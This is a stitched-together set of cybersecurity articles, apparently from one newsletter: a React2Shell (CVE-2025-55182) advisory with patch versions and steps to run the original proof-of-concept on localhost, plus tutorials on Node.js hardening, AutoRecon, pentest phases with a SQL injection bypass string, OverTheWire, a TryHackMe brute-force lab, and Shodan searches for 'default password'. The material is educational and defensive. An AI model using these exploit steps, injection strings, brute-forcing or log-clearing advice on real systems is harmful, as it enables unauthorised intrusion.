Table of Contents

• What is "React2Shell"?

• Why is this Happening Now?

• Should You Worry About this Change?

• Is this Mandatory?

• How Bad Can It Get? The Extent of Exploitation

• What Would be the Code Change for This?

• Advanced: Verify with the Original Exploit (PoC)

• Emergency Response: What If You Were Already Compromised?

• Conclusion

What is "React2Shell"?

Think of your server receiving data like a mailroom receiving packages.

Usually, a mailroom checks if a package is safe before opening it. But in vulnerable versions of React and NextJS, the "Flight" protocol (used to communicate between the server and client) acts like a mailroom that blindly opens every package and follows any instructions inside immediately.

This vulnerability (CVE-2025-55182) allows an attacker to send a specifically crafted "package" (HTTP request) that forces your server to execute malicious code – like stealing passwords or installing viruses –without even logging in.

Why is this Happening Now?

It's all about how modern frameworks handle data serialization. There are a few reasons why this was just discovered.

First, React has complex serialization. To make Server Components seamless, React sends complex data structures back and forth.

Second, it has the "Flight" protocol. The vulnerability was found in how this specific protocol de-serializes (unpacks) data. It was too trusting of the input it received from the client side.

Should You Worry About this Change?

You need to pay attention if your app qualifies for any of the below:

• You are using NextJS App Router: This is the default in newer NextJS versions (v13+).

• You are using React 19: Specifically versions with Server Components enabled.

• You use Server Actions: If your app takes user input and processes it on the server using React's server actions.

Is this Mandatory?

Yes. This is a critical security update. If your app qualifies in any of the above scenarios, you need to act immediately. Because, this vulnerability is being exploited right now.

How Bad Can It Get? The Extent of Exploitation

You might be thinking, "My site is just a simple content wrapper, surely I'm not a target?" Unfortunately, with Remote Code Execution (RCE), the attacker doesn't just "break" your site – they own the server it runs on.

Here is exactly what a hacker can do once they exploit this vulnerability:

Total Environment Theft

The most immediate risk is your .env file. Attackers can execute code to read your environment variables, instantly gaining access to your AWS Secret Keys, Database passwords, Stripe API keys, and OpenAI tokens.

The "Shell" Access

As the name "React2Shell" implies, attackers can open a reverse shell. This gives them a command-line interface on your server, allowing them to browse your file system as if they were sitting in front of your computer.

Lateral Movement

Once inside your NodeJS server, they are behind your firewall. They can now attack your internal services (like Redis, internal databases, or private micro-services) that are usually blocked from the outside world.

Supply Chain Poisoning

If your build server is vulnerable, an attacker could potentially inject malicious code into your deployment pipeline, affecting every user who visits your site in the future.

Botnet Recruitment

Hackers often automate these attacks to install crypto-miners, using your server's CPU (which you pay for!) to mine digital currency for them, often crashing your application in the process.

What Would be the Code Change for This?

You don’t need to rewrite your application code, but you must update your dependencies in your release line.

The vulnerability is fully resolved in the following patched NextJS releases:

• 15.0.5

• 15.1.9

• 15.2.6

• 15.3.6

• 15.4.8

• 15.5.7

• 16.0.7

Patched canary releases for NextJS 15 and 16:

• 15.6.0-canary.58 (for 15.x canary releases)

• 16.1.0-canary.12 (for 16.x canary releases)

These versions include the hardened React Server Components implementation.

Here are the patched versions for React JS:

• 19.0.1

• 19.1.2

• 19.2.1

Frameworks and bundlers using the aforementioned packages should install the latest versions provided by their respective maintainers.

Alternatively, you can run npx fix-react2shell-next in your NextJS project to launch an interactive tool which can check versions and perform deterministic version bumps per the recommended versions above. See the GitHub repository for full details.

There is no workaround other than upgrading to a patched version.

It’s highly recommended to rotate all your application secrets, once you have patched your version and re-deployed your application.

Advanced: Verify with the Original Exploit (PoC)

If you want to be 100% sure your patch is working, or if you want to understand how the attack actually works, you can use the original Proof of Concept (PoC) created by the security researcher (Lachlan Davidson) who found the bug.

Repository: React2Shell-CVE-2025-55182-original-poc

Lachlan provided three variations of the exploit script. The most important one for testing is 01-submitted-poc.js, which is the exact, simplified version submitted to Meta for the bug bounty.

How the Exploit Works

According to the repository, the attack works by tricking the parser:

1. The attacker sends a payload using $@x to access a specific data Chunk.

2. They "plant" a .then function on a fake object.

3. The JavaScript runtime thinks it is handling a Promise and tries to "unravel" it.

4. This allows the attacker to re-enter the parser with a malicious fake chunk, giving them access to internal server gadgets (like _response) to execute code (RCE).

Steps to Recreate the Issue

⚠️ WARNING: Only run this against a local development server (localhost) that you own. Never run this against production servers or public websites.

Note: I forked Lachlan’s repo and made minor changes to make it easy for you to run the script.

Step 1: Clone the Repository

Run the following commands to clone the repository, navigate into the project, and install dependencies:

git clone https://github.com/arunachalam-b/React2Shell-CVE-2025-55182-original-poc.git
cd React2Shell-CVE-2025-55182-original-poc
npm i

Step 2: Run a Vulnerable Local Server

Start your NextJS application locally (ensure it’s running a vulnerable version, for example NextJS 15.0.0, for the test to succeed).

npm run dev
# usually runs on http://localhost:3000

Step 3: Execute the Test

You will need to modify the script or use a tool like curl to send the payload structure found in 01-submitted-poc.js to your server's endpoint (usually a Server Action endpoint). Or simply run the following command if your app is accessible at http://localhost:3000:

node 01-submitted-poc.js

If the exploit succeeds (on the vulnerable version), the console will log the execution of the code (RCE). If the exploit fails (after you patch), the server will either reject the request or error out safely.

You can also confirm if your infected web server prints 50 in the console. Because we inject the code to do a calculation (look at _prefix field in the below JSON) that results in 50.

After you apply the fix, you should see an error while running the script. In this case, as I’m using NextJS v15.1, the fix is upgrading the next package to version 15.1.9. Here are the screenshots after upgrading the package and running the script.

Step 4: Verification

Once you have confirmed the exploit works on the old version, update your packages (as shown in the section above) and run the script again. It should no longer trigger the code execution.

Emergency Response: What If You Were Already Compromised?

If you suspect your server was exposed to the internet with a vulnerable version, assume the worst. A hacker may have already stolen your keys or left a "backdoor" to return later. Patching the code alone is NOT enough in this case.

Follow this "Nuke and Pave" protocol immediately:

Step 1: Isolate and Shutdown

Take the compromised server offline immediately. Do not try to "fix" it while it is running.

Step 2: Rotate ALL Secrets (Crucial Step)

Assume every secret in your .env file is in the hands of a hacker. You must generate new ones:

• Change the password for your database users.

• Rotate AWS Access Keys, Google Cloud Service Account keys, and so on.

• Roll your Stripe/PayPal/Razorpay API keys.

• Rotate your NEXTAUTH_SECRET or any JWT signing keys.

Step 3: Do Not "Clean" — Rebuild

Do not attempt to find and delete malware files on the server. Hackers are good at hiding.

• Destroy the existing container, droplet, or EC2 instance entirely.

• Build a fresh instance from your source code (after applying the patch).

Step 4: Audit Your Logs

Look at your database and cloud provider logs. Did anyone download your entire user database? Did anyone spin up expensive GPU instances on your AWS account? Check for unusual activity that occurred before you patched.

Conclusion

In this article, you learned about the "React2Shell" vulnerability, how to verify it using the original developer's tools, and how to upgrade your app to secure your Server Components. I hope you have a clear idea about why this update is urgent. By being proactive now, you can avoid a catastrophic data breach.

You can follow my Twitter/X account to receive the top AI news everyday. If you wish to learn more about cybersecurity, subscribe to my email newsletter and follow me on social media.

Maybe you’ve heard about SQL injection, brute force attacks, or data leaks.

But here’s the thing: it’s not just about big hacks. Even small gaps in your API can lead to big problems. And no one wants to get that “your data’s been exposed” message.

In this article, I’ll walk you through seven ways to harden your Node.js API.

These are practical tips you can apply right away. I’ll keep the code examples simple and the language even simpler. Let’s get into it.

1. Use Environment Variables

Storing sensitive data like database credentials, API keys, or JWT secrets directly in your code is risky. If your code ends up in the wrong hands, so does everything else.

Instead, store this data in a .env file and use the dotenv package to access it:

require('dotenv').config();

const dbPassword = process.env.DB_PASSWORD;

Make sure you never commit your .env file. Add it to your .gitignore file to keep it private.

2. Validate All Input

Attackers love user input.

If you don’t check what comes into your API, they’ll sneak in commands, inject code, or crash your app.

The best way to stop them is by validating every piece of input. Use a package like Joi or zod to define what your API expects:

const Joi = require('joi');

const schema = Joi.object({
  username: Joi.string().alphanum().min(3).max(30).required(),
  password: Joi.string().pattern(new RegExp('^[a-zA-Z0-9]{6,30}$')).required()
});
const { error } = schema.validate(req.body);
if (error) {
  return res.status(400).send(error.details[0].message);
}

In the above code, we have defined the exact data type the schema expects. This way, wrong data gets blocked before it reaches your logic or database.

3. Rate Limit Your Endpoints

Bots and brute force attacks work by flooding your server with requests. Once your server reaches it limit, your API will crash.

Set a limit on how often a user can hit your API using middleware like express-rate-limit Here is an example.

const rateLimit = require('express-rate-limit');

const limiter = rateLimit({
  windowMs: 15 * 60 * 1000, // 15 minutes
  max: 100 // limit each IP to 100 requests per windowMs
});
app.use('/api/', limiter);

The above code restricts API requests coming from an IP address to 100 per 15 minutes. This is like putting a speed bump in front of a runaway car.

4. Always Use HTTPS

HTTP sends data in plain text. That means anyone between your server and the user can read it. HTTPS encrypts everything. It’s not optional anymore.

If you’re using a platform like Heroku or Vercel, HTTPS is automatic. If you’re self-hosting, you can set it up with services like Let’s Encrypt.

Also, force HTTPS on all incoming traffic. You can use middleware like this:

app.use((req, res, next) => {
  if (req.headers['x-forwarded-proto'] !== 'https') {
    return res.redirect('https://' + req.headers.host + req.url);
  }
  next();
});

Encrypt the ride. Always.

5. Use Helmet to Secure HTTP Headers

HTTP headers are key-value pairs sent in requests and responses over the web. They give extra information about what’s being sent – like who’s sending it, what type it is, how it should be handled, and more.

HTTP headers are small, but they can be powerful tools to protect your app. Helmet is a Node.js middleware that sets secure headers for you.

const helmet = require('helmet');
app.use(helmet());

Helmet helps prevent attacks like cross-site scripting (XSS), clickjacking, and others just by setting the right headers.

One line of code, a big step up in security.

6. Sanitize Data to Prevent Injection Attacks

Injection attacks happen when you blindly trust input and plug it into a command or query.

For example, an attacker might submit a piece of text that turns into a command in your database.

You should sanitize data before it gets to any sensitive function. Libraries like express-mongo-sanitize or xss-clean help clean up malicious input.

const mongoSanitize = require('express-mongo-sanitize');
const xss = require('xss-clean');

app.use(mongoSanitize());
app.use(xss());

This strips out dangerous characters and scripts that could do real damage.

7. Use Strong Authentication and Authorisation

Authentication is about knowing who the user is, and authorisation is about what they can do. You need both, and you need them to be strong.

Use JWT (JSON Web Tokens) or sessions to manage logged-in users. Here’s a quick JWT example:

const jwt = require('jsonwebtoken');

const token = jwt.sign({ id: user._id }, process.env.JWT_SECRET, {
  expiresIn: '1h'
});

Always verify the token before letting a user access protected routes:

const decoded = jwt.verify(token, process.env.JWT_SECRET);

And don’t forget roles. A user who can view data shouldn’t be able to delete it unless they’re supposed to.

Final Thoughts

Security isn’t just a feature – it’s a habit. You can’t do everything all at once, but you can start with a few key changes.

Use environment variables. Validate your inputs. Add rate limiting. Move to HTTPS. Install Helmet. Sanitize everything. Lock down your authentication.

Each of these steps is a small lock on a big door. The more you add, the harder it is for someone to break in. So take a little time now. Your future self and your users will thank you.

For more cybersecurity tutorials, join our newsletter. To learn the basics of Offensive Cybersecurity, check out our Security Starter Course.

Before you touch a single exploit or send a single payload, you need to know what services are running, what ports are open, what technologies are in play, and where the weak spots might be.

This phase is called reconnaissance. It can eat up hours – sometimes even days – if you’re doing it manually.

That’s where Autorecon comes in.

What is AutoRecon?

Autorecon is a tool that automates most of the initial recon work. It’s not a magic box, but it’s close.

Autorecon takes a list of IPs or domain names and runs a series of predefined scans. Then it organizes the output neatly so you don’t waste time parsing through raw Nmap files or rerunning missed commands.

If you’re just starting out with pentesting – whether you’re on your first TryHackMe box or your tenth OSCP practice lab – Autorecon can save you a ton of time. Let’s break down how it works.

What Exactly Does Autorecon Do?

At its core, Autorecon does three things:

1. Runs Nmap scans on each target IP or hostname.

2. Identifies services running on open ports.

3. Runs specific enumeration tools based on those services.

Let’s say you run it against an IP that has ports 22 (SSH), 80 (HTTP), and 139/445 (SMB) open. Autorecon will:

• Use Nmap to check versions and scripts for each port.

• Run nikto or gobuster on port 80.

• Run enum4linux or smbmap on SMB.

• Store everything in organized folders for later review.

That’s what you’d do manually – but faster, cleaner, and without forgetting steps.

How to Use Autorecon

Let’s walk through a quick example. Assume you have a target at 10.129.8.143.

Here’s the basic command:

autorecon 10.129.8.143

That’s it. No flags, no extra setup. Autorecon takes care of the rest. To understand what is going on behind the scenes, let's add the verbosity -v flag.

Here is a sample result.

Behind the scenes, it creates a folder structure like this:

results/
├── 10.129.8.143/
│   ├── scans/
│   │   ├── nmap/
│   │   └── gobuster/
│   ├── reports/
│   └── notes.txt

You’ll find full Nmap outputs, service-specific tool results, and even a place to jot down your own observations. All ready to go.

If you want to scan multiple targets, just pass a list:

autorecon targets.txt

Once Autorecon completes a scan, go to the results/<IP>/scans/ folder. Start with the Nmap outputs.

Look for open ports and services:

• Port 80 open? Check gobuster and nikto outputs in the HTTP folder.

• SMB ports open? Look in the enum4linux and smbmap results to find shared drives or user info.

• FTP anonymous login allowed? Use that access to explore directories.

These findings will give you the next steps – like browsing a web service, crafting a payload, or checking for known exploits.

Why It’s a Big Deal for Beginners

If you’re new to pentesting, one of the hardest parts is remembering everything you’re supposed to check. You pop open a port, and you think:

• “Wait… Should I run enum4linux on this?”

• “What was that flag for aggressive Nmap scanning again?”

• “Did I already check this web service with nikto?”

Autorecon takes that mental load off your shoulders. You can focus on analysis, not babysitting scans.

And here’s another benefit: it helps you learn the process.

While Autorecon automates recon, it shows you every tool and command it runs. You can open the raw output, read the flags, and understand why it ran those scans.

Example: You’ll see it runs nmap -sV -sC for version detection and scripts. This helps beginners understand which scans map to which services and why they matter.

As it runs, you’ll see all the tools and commands it’s using. You can look at the raw results, see what worked, and gradually build your own workflow.

What It Scans (By Default)

Here’s a quick overview of what Autorecon runs based on port and service:

Nmap:

• Quick scan

• Full TCP port scan

• Service/version detection

• NSE scripts

HTTP/HTTPS:

• gobuster (directory brute-forcing)

• nikto (vulnerability scanner)

• whatweb (tech detection)

SMB:

• enum4linux-ng

• smbmap

• Nmap SMB scripts

FTP:

• Anonymous login check

• Nmap FTP scripts

SSH:

• Banner grab

• SSH version check

And that’s just a slice. It handles other services too, like MySQL, SNMP, SMTP, and even RPC.

When Autorecon Is Most Useful

Autorecon shines in certain situations:

• Training labs: You get a clear view of your target with minimal setup.

• OSCP preparation: It runs the exact recon tools you’ll need to use on the OSCP exam.

• Time-limited pentests: When you need to hit multiple targets fast, Autorecon keeps your output consistent and saves you from retyping everything.

But it’s not just about speed. It’s about being thorough. With manual scanning, it’s easy to miss something small. Autorecon doesn’t forget.

What Autorecon Doesn’t Do

Autorecon isn’t an exploit tool. It doesn’t hack anything for you. It doesn’t guess credentials or bypass login pages.

It’s focused purely on reconnaissance. That means you still have to:

• Review scan results

• Analyze web services manually (for example, browse the site, test inputs)

• Decide which exploits or payloads to run

Also, it can be noisy. If you’re on a real engagement where stealth matters, some scans might raise alarms. In that case, you’d want to run more controlled commands manually.

Tips for Using Autorecon Effectively

Use flags to control scans:
To increase verbosity and skip previously scanned hosts:

autorecon -v --only-scans-dir 10.129.8.143

Customize wordlists for better results:
By default, Autorecon uses small wordlists. You can improve this:

autorecon --dirbuster.wordlist /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt 10.129.8.143

This makes directory brute-forcing more effective, especially on web targets.

Don’t skip the output: Read the Nmap files, check the HTML reports. Tools don’t think like humans. You still have to connect the dots.

Final Thoughts

Autorecon doesn’t replace your skills – but it helps supercharge them. Instead of spending 30 minutes typing out scan commands, you can run one command and start analyzing in minutes. This helps beginners stay focused, and it helps pros save time.

So if you’re tired of rerunning the same Nmap scans over and over, or you just want cleaner results and fewer mistakes, let Autorecon do the heavy lifting – so you can focus on the part that really matters: breaking stuff.

For more cybersecurity tutorials, join our newsletter. To learn the basics of Offensive Cybersecurity, check out our Security Starter Course.

To make sure that these activities are safe and secure, dev teams need to have a robust security testing framework in place. This helps identify vulnerabilities, prevent cyber threats, and maintain the integrity of digital transactions.

In this article, you will learn all about penetration testing – what it is, why each phase of the process is important, and the tools pentesters use to do their jobs.

What is Penetration Testing?

Penetration Testing is a practice used by security professionals to help companies and teams secure their data. A company gives the security pro permission to try to find vulnerabilities in their system. The security pro then reports any potential weak spots they find to the company so they can fix them. This helps these companies prevent potential attacks before hackers can get access to their data.

If a company fails to conduct pentesting, it can lead to serious consequences like policy violations, hefty compliance regulation fines, loss of customer trust, and a decline in the organization's reputation and overall business value.

There are four phases of penetration testing:

1. Reconnaissance

2. Scanning

3. Exploitation

4. Report Submission

Let’s go through each one so you can learn what’s involved in the entire process.

Reconnaissance: The Art of Information Gathering

Reconnaissance involves gathering information about the target system or network. A pentester’s goal here is to collect as much data as possible about the target, helping them understand the target’s architecture, identify potential vulnerabilities, and develop an effective attack strategy.

In reconnaissance, testing can be conducted in various ways, such as browsing social media for information about the target, using information-gathering tools like theHarvester to crawl websites related to the target domain, and more.

At this stage, all available data—whether technical or non-technical—is gathered without filtering for relevance. The goal is to collect as much information as possible, as even seemingly insignificant details can later prove useful in an attack.

Reconnaissance is crucial for a successful penetration test. So it can be a time-consuming process, often taking anywhere from a few hours to several weeks, depending on the complexity of the target.

Types of Reconnaissance

We can categorize reconnaissance into two main types based on the level of interaction with the target system:

First, we have passive reconnaissance. This involves gathering information from publicly available sources without directly interacting with the target system. Since no direct contact is made, it is stealthy and less likely to alert the target.

At this point, a question may arise: If penetration testing is conducted with prior approval from the target domain, why should we conduct passive reconnaissance to minimize direct interaction when we have the freedom to perform active reconnaissance?

Well, a penetration tester must think from an unethical hacker's perspective. Attackers often rely heavily on passive reconnaissance techniques to gather critical information without alerting the target, making it a crucial phase in ethical hacking as well.

This is why penetration testing should include passive reconnaissance. It helps identify potential information leaks, such as a target company's public announcements or employees posting coding-related doubts on platforms like Substack, which could lead to unauthorized system access.

Active Reconnaissance, on the other hand, involves direct interaction with the target system to extract specific information. Common methods include port scanning, banner grabbing, and network sniffing.

This approach provides more accurate and detailed information, but it comes with a higher risk—the tester’s IP address or digital footprint may be logged by the target system.

For the reconnaissance phase, there are numerous tools available on the internet. But a few are considered highly efficient and popular among penetration testers. Some of these include Medusa and theHarvester.

As an example here, we’ll use theHarvester to gather information on a target domain (Zudio.com) and analyze the different types of data retrieved by the tool.

You can see that the tool crawled the Brave search engine and discovered a couple of IP addresses along with additional subdomains of the target domain (Zudio.com). These findings should be properly documented and included in the target’s reconnaissance report.

Scanning: The Art of Detecting Loopholes

The information a pentester gathers during the reconnaissance phase serves as a crucial input for the scanning phase. This data helps them gain deeper insights into the target system, allowing them to pinpoint areas and filter data that require further analysis.

With a wide range of scanning tools available, pentesters utilize various techniques to:

• Identify open ports, as they can serve as potential entry points.

• Monitor network activity to detect vulnerabilities and security gaps.

Phases of Scanning

Scanning typically involves two key steps:

First, we have port scanning, which identifies open and closed ports on the target system. This helps determine which services are running and are potentially exploitable.

System Ports serve as entry points for a computer system to perform various tasks. Ensuring that all unnecessary ports are closed is crucial for security. Leaving optional ports open can create potential entry points for hackers.

You can use tools like Nmap, Netcat, Masscan for this purpose.

For better understanding, let's scan a sample target domain (192.168.13.136) using Nmap and check which service ports are open.

Next, we have vulnerability scanning, which detects weaknesses in software, configurations, and services. It helps pentesters assess the security risks associated with identified ports and services.

Let’s use the same nmap tool to detect the vulnerabilities from the identified open ports. In the scanning results, you can see that port 21 is open and this port is specifically used for File Transfer Protocol.

Here, we run Nmap on the target address (192.168.13.136) to scan FTP port 21 using the ftp-brute script. This allows us to check whether the FTP service is accessible using default usernames and passwords.

During the scan, we were able to extract additional useful information, including details about the FTP server version (vsftpd 2.3.4). This information can be valuable for identifying potential vulnerabilities in this version.

Finally, the tool successfully identified a vulnerability in the server by discovering valid usernames and passwords from the dictionary list included in the tool.

In general, reconnaissance and scanning are often overlooked by security analysts, assuming they are not important. But these phases provide a valuable dataset and a deeper understanding of the target domain. They help in filtering and directing the exploitation process, allowing penetration testers to focus on specific vulnerabilities instead of blindly attempting various exploits.

Skipping these phases leads to inefficiency, wasting time, resources, and effort. So for successful exploitation, it is essential to conduct thorough information gathering and scanning before proceeding further.

Exploitation: The Art of Attack Simulation

The outcome of the scanning phase gives pentesters a clear understanding of potential entry points, commonly referred to as “open doors”, through identified ports and services. These insights help testers determine which vulnerabilities can be exploited to simulate a real-world cyberattack.

Once vulnerabilities are identified, testers deploy various attack techniques to assess their impact. The goal is to demonstrate how a malicious hacker could gain unauthorized access and compromise the target system. Some common attack methods include:

• SQL Injection – Exploiting database vulnerabilities.

• Cross-Site Scripting (XSS) – Injecting malicious scripts into web applications.

• Buffer Overflow – Overwriting memory to execute malicious code.

• Brute Force Attacks – Cracking weak passwords for system access.

For a clearer understanding, let's explore how database vulnerabilities are exploited using SQL Injection attacks.

Let's say there is a username and password field in a login form. Typically, when a user enters their credentials, the system fetches these input values, constructs a SQL query, and sends it to the server for authentication.

SQL Injection works by manipulating this query to bypass authentication. At a basic level, an attacker can input specially crafted values to alter the query logic. For example, consider the following SQL query:

SELECT * FROM PRODUCTS WHERE USERNAME = " OR 1=1 -- " AND PASSWORD = "1234"

Let’s break down this exploit to see what’s going on:

• The OR 1=1 condition always evaluates to true, meaning the query retrieves all records from the database.

• The -- sequence is a comment operator in SQL, which ignores the rest of the query (including password verification).

As a result, the attacker gains access without valid credentials, effectively bypassing authentication.

Report Submission: The Art of Validation

The final phase of penetration testing involves reporting the vulnerabilities identified during the security test cycle. These reports are crucial for guiding the remediation process, ensuring that the company addresses any weaknesses before they can be exploited.

Penetration testing reports typically include detailed information about the attacks conducted, the respective results, and an assessment of the risks involved. Importantly, the language used in these reports is non-technical, as the findings are often shared with different teams across the organization, including:

• Management

• Higher authorities

• Non-technical teams (like HR, legal, and so on)

These reports must be easily understandable and confidential, as they may contain sensitive information about the organization’s vulnerabilities.

The report should include the following key parameters:

• Number of employees involved

• Start date and end date of the assessment

• List of target domains

• List of open ports (if any)

• List of identified vulnerabilities, categorized by risk level (Critical, High, Medium, Low, Informational)

• Preventive measures to mitigate risks

• List of tools used during the assessment

While the structure and content of these reports may vary from organization to organization, the above parameters are mandatory for a comprehensive security assessment.

The goal is to ensure that stakeholders at all levels of the organization can take appropriate action, whether it's patching a vulnerability, revising a policy, or updating a security strategy.

Conclusion

The penetration testing lifecycle is continuous and it’s something your team must perform periodically. You can’t just do it once, address those concerns, and forget about it.

As new vulnerabilities emerge with the release of updated versions of software, applications, and systems, penetration testing remains essential in identifying and addressing these new risks.

A proactive approach to security through continuous penetration testing is crucial for maintaining a safe and secure digital environment for organizations and their users.

But real hacking isn’t quite like that. It takes patience, creativity, and most importantly, a lot of practice.

One of the best ways to sharpen your hacking skills is by playing wargames. They are interactive hacking challenges that push your problem-solving abilities. Of the many online wargames, OverTheWire is the best. It is fun, educational, and accessible for both beginners and expert hackers.

In this article, we’ll explore why OverTheWire is such a fantastic resource. Whether you’re new to hacking or want to test your skills, OverTheWire will have something for you.

What are Wargames?

In cybersecurity, wargames are exercises. They simulate attacking and defending computer systems. These games often mimic real-life scenarios. They help you improve your skills without real-world risks.

Wargames can take different forms. Capture the Flag (CTF) is a common type. Players solve challenges to find hidden “flags” in the system. In attack-defense games, teams protect their systems while trying to compromise the opponent’s. In incident response wargames, defenders react to a simulated cyberattack and work to recover.

Wargames give you hands-on experience in cybersecurity. They teach you how to solve problems, think critically, and handle pressure while working in teams. These exercises are valuable for building real-world skills.

What is OverTheWire?

OverTheWire is an online platform that offers a collection of wargames. These wargames teach you the basics of cybersecurity through hands-on challenges.

The site hosts several different games, each focusing on different aspects of hacking. You will encounter everything from basic Linux commands to more advanced topics.

OverTheWire wargames are progressive. This means that they start out easy and gradually get harder as you advance through the levels.

If you’re just starting out, this makes the learning curve manageable. But don’t worry, the more complex challenges will give even seasoned hackers something to chew on.

OverTheWire doesn’t just stick to one type of challenge. As you progress through different games, you’ll encounter a wide array of topics. These include Linux fundamentals, networking, file manipulation, scripting, and many others.

Some games, like Narnia, exploit buffer overflows. Others, like Krypton, dive into cryptography. This variety ensures you get a well-rounded education in different aspects of cybersecurity.

OverTheWire has a large, active community. While the wargames encourage you to solve problems on your own, there is no shortage of help when you need it.

The official forums are great for asking questions and sharing insights. You can also discuss tricky levels with other players.

While the community can help, solving the challenges yourself is the best way to learn. Looking up answers too early can take away from the experience.

Wargames You Should Try

Let’s take a quick look at some of the key wargames on OverTheWire that you can start playing today.

Bandit

Bandit is the entry point for most people. Bandit teaches you basic Linux commands, file manipulation, and navigation. It’s a perfect place to start if you’ve never used the terminal before or if you want to brush up on fundamental skills.

For example, in one of the early Bandit levels, you are given a password hidden inside a text file. The challenge is finding the file, reading its contents, and then using that information to advance to the next level.

Leviathan

Leviathan is more advanced. It teaches you about binary analysis and how to find vulnerabilities in programs. Players solve puzzles that require reverse engineering, debugging, and exploiting weaknesses. It’s a great way to practice finding and fixing security flaws in software.

Narnia

If you want to learn about buffer overflows and binary exploitation, Narnia will teach you both. It starts with simple vulnerabilities and gradually increases in difficulty. You’ll learn how to exploit code to gain control over programs and escalate privileges.

Conclusion

OverTheWire is a fantastic resource for anyone interested in ethical hacking. The platform offers a structured, hands-on way to build up your cybersecurity skills. It’s not just about solving puzzles, it’s about learning how to think like a hacker.

So, if you want to sharpen your problem-solving skills, improve your technical knowledge, or just have some fun breaking into systems (legally), give OverTheWire a try. You’ll learn a lot, and who knows, you might just become the next great cybersecurity expert!

For more articles on Cybersecurity, join our weekly newsletter Stealth Security.

Well, I’m here to give you that experience – for free.

I’ve created a hands-on lab with TryHackMe (THM). TryHackMe is an online platform that offers virtual labs for learning cybersecurity.

THM reduces complex virtual machine setups to help you practise your skills. Using THM, you can use machines right from your browser.

It’s a safe space to practice your skills. You’ll need to sign up for a free account to work with this lab, but you don’t have to buy a premium plan.

First, I’ll give you an intro to the platform. You can then visit the lab and hack your first machine. Here’s the Lab URL: https://tryhackme.com/jr/SS_HYFM

How to Work with TryHackMe

To practise hacking, you need a target and an attack machine. THM works by creating isolated labs, also called “rooms”. Every room has its own target and attack machines.

Each room is split into multiple tasks. You must finish a task and answer some questions to pass the task. Once you finish all the tasks, you pass the room.

To start the target machine, click on the green “Start machine” button. Once you start, give it a few minutes to display its IP address.

Most targets will not have a GUI. You will only be interacting with it using an IP address.

Now you need an attack machine. THM offers a Kali virtual machine to use as the attacking machine. Kali is a Linux version with all the tools you need pre-installed in it. So no extra setups or installations are needed.

You can find the “Start Attackbox” button on the top left. It will open the attacking machine by splitting your screen.

Lab Tasks

The lab is split into five tasks:

1. Platform overview

This task gives you an introduction to how the platform works, similar to the above section. Once you start both the virtual machines, you can test the connection by pinging the target from the attackbox.

2. Linux 101

We have added a task on basic Linux commands. Even if you are an experienced Linux user, it can help brush up your skills. Here are the commands you will be working with.

• whoami — tells you the username of the currently logged-in user.

• pwd — Shows the full path of the current directory. It helps you track your current location in the system.

• clear — clears the screen

• ls — Lists files and directories in the current folder.

• cat — Displays the contents of a file. It can also help create new files. cat [filename] will display a file’s contents. Using the > operator, cat > [filename] will create a new file.

• rm — Deletes files or directories. Useful for cleaning up traces of activities, such as removing logs.

3. Scanning with Nmap

Nmap (short for Network Mapper) is a free, open-source tool used for port scanning. It can scan for open ports, identify services, and even detect the target’s operating system.

Nmap will help you scan the target using its IP address. The information from Nmap will help you find entry points of getting into the target.

4. Brute-forcing with Hydra

Once you find an entry point, you can use a brute-force tool to find the password. In this target, there will be an open SSH port. SSH is a protocol that helps login to a server remotely.

You’ll use Hydra along with a list of passwords to hack your way into the target server. Once you find the password, you can login to the target using SSH. Here is the syntax for using SSH to login to a server.

ssh username@ip_address

It will then prompt for the password. Once you login to the target, you can find a text file called flag2.txt. The contents of this file will be the answer to the final question in the lab.

5. Wrapping Up

The final task will ask for your feedback about this lab. Let us know your thoughts and we will make this lab better for the next person.

Let’s Go

Go to TryHackMe and sign up for an account. Once you are done, click here to go to the lab.

Happy hacking!

For more articles on Cybersecurity, join our free newsletter Stealth Security. To learn ethical hacking tools using hands-on labs, check out our private community The Hacker’s Hub.

When you hear the term “search engine,” your mind likely jumps to Google, Bing, or Yahoo. These platforms are familiar to most of us, helping us find websites, images, and news.

But there’s another search engine out there, one that most people have never heard of. And it’s a lot more powerful and dangerous. It’s called Shodan.

Shodan is a database of online devices, many of which are not meant to be public. The scary thing about Shodan is that it can have one of your devices, too.

Let’s look at what Shodan is, how it works, and why it’s both a valuable tool and a potential threat.

What is Shodan?

Shodan is a search engine that discovers devices connected to the internet. This includes everything from simple webcams and routers to complex industrial control systems.

Traditional search engines index websites. Shodan scans the internet for devices and lists them based on their IP addresses, open ports, and other publicly available data.

Shodan works by scanning the internet using specific protocols to identify connected devices. It collects all information about the device.

These include IP addresses, open ports, and even the software versions in use. This data is then made searchable by allowing users to query the database. You can look for specific types of devices or vulnerabilities using Shodan’s UI or the CLI tool.

Let’s look at how you can use Shodan both via the web interface and the command line.

How to Use the Shodan Web Interface

Go to shodan.io and create an account. While some searches are possible without an account, you’ll need to log in to access most features.

Also, you will need a premium account to find most devices, and the results of the free plan are very limited.

On the homepage, you will see a simple search bar. You can type in general queries like “default password” or “webcam” to see what Shodan can find.

For example, typing “default password” will list devices with default settings. They are vulnerable to unauthorized access.

Shodan also allows you to filter results with specific parameters. For example:

• Search for specific devices: If you’re looking for webcams, you might type “webcam country:US”. This query will return webcams located in the United States.

• Search by IP address: To see details about a specific IP, type the IP address into the search bar.

• Search by port: To find devices with a specific port open, use a query like “port:22”. This will find devices with SSH (port 22) exposed to the Internet.

After executing a search, Shodan will present a list of matching devices. Each result includes the IP address, open ports, and the software on the device.

For example, a search for “port:22” might find SSH servers and their configuration details.

How to Use the Shodan Command-Line Interface (CLI)

For advanced users, Shodan provides a command-line interface (CLI). It lets you search and automate tasks.

Note: API usage may be limited based on your account and you might have to pay to use it.

Before you can use the CLI, you will need to install it. You can do this using Python’s package manager, pip. Open your terminal and type the following.

pip install shodan

Once installed, you can see if it works by trying the help command.

shodan -h

Now you have to add your Shodan CLI with your API key. You can find your API key on your Shodan account page. To set it up, use the following command:

shodan init YOUR_API_KEY

Now you can start searching. Here’s an example of a basic search:

shodan search "default password"

This command will return devices with “default password” in their banners. This often indicates poor security practices.

You can search for devices with specific characteristics as before:

shodan search "port:80 country:US"

This command finds web servers (port 80) located in the United States.

To get detailed information about a specific IP address, use this command:

shodan host 8.8.8.8

It will return all known data about the specified IP. This includes open ports and detected services.

To see more commands or debug CLI issues, here is the official documentation from Shodan.

The Good, the Bad, and the Dangerous

Shodan is a double-edged sword. It’s a powerful tool for cybersecurity professionals. It also poses significant risks if used with bad intent.

